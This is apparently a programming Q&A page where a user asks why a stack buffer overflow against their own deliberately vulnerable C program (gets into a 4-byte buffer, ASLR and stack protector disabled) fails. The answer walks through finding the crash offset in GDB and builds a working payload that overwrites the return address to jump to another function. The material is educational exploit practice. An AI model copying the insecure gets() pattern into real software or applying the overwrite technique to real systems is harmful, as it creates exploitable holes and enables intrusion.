CODEWITHSUNDEEP
clinuxaslrbuffer-overrun
jonatan haish
jonatan haish

Reputation: 21

ROP faild on linux even when ASLR and stack compiler protector are disabled

I tern off the ASLR and tern of the gcc stack protector.

And I wrote C vulnerable code and I tried to overflow the buffer so I check how many character need for the crash. And I tried to change the return address , to another function but I got a message:

Segmentation fault (core dumped)

This is my C code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>



void sss()
{
  printf("good by");
}


void scriptpy(){
   printf("hello world\n");
}



int main(int argc , char** argv)
{
  char buf[4];
  gets(buf);
  return 0;
}

I found the address of the "sss" function and i tried to insert the hex value .

This is my address:

(gdb) disas sss
 Dump of assembler code for function sss:
   0x00000000000006ca <+0>: push   %rbp

To edit the return address i insert:

printf "AAAABBBBB/xe2/x06/x00/x00/x00/x00/x00/x00" | ./cTutorial

Upvotes: 2

Views: 193

Answers (1)

St0rm
St0rm

Reputation: 401

Let's suppose that the binary is compiled with the flag -fno-stack-protector and the ASLR is disabled echo 0 | sudo tee /proc/sys/kernel/randomize_va_space.

Find the crash:

The program start crashing with payload of 12 characters:

$ python3 -c "print('A' * 12)" | ./cTutorial
Segmentation fault (core dumped)

Controlling RIP

Using GDB to find the offset that overwrite RIP, we can find that the first byte of RIP can be overwritten with 0x41 ('A') with a payload of 13 characters:

$ gdb -q cTutorial
Reading symbols from cTutorial...
(No debugging symbols found in cTutorial)
(gdb) r <<<$(python3 -c "print('A' * 13)")
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7de0041 in ?? () from /lib/x86_64-linux-gnu/libc.so.6

Note that RIP is overwritten with 0041 where 00 is the null characters terminating the string.

To control all bytes of RIP:

(gdb) r <<<$(python3 -c "print('A' * 18)")
Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in ?? ()

Let's suppose that the function sss is located at the address 0x0000555555555189.

The final payload is:

(gdb) b sss
(gdb) r <<<$(python3 -c "print('A' * 11 + '\x89\x51\x55\x55\x55\x55')")
breakpoint 1, 0x0000555555555189 in sss ()

Where 11 = 18 - (len('\x89\x51\x55\x55\x55\x55') + 1)
+1 for the null byte

The jump to the function sss is taken. The program will crash after the jump to the function sss as the stack will be corrupted.

Upvotes: 3

Related Questions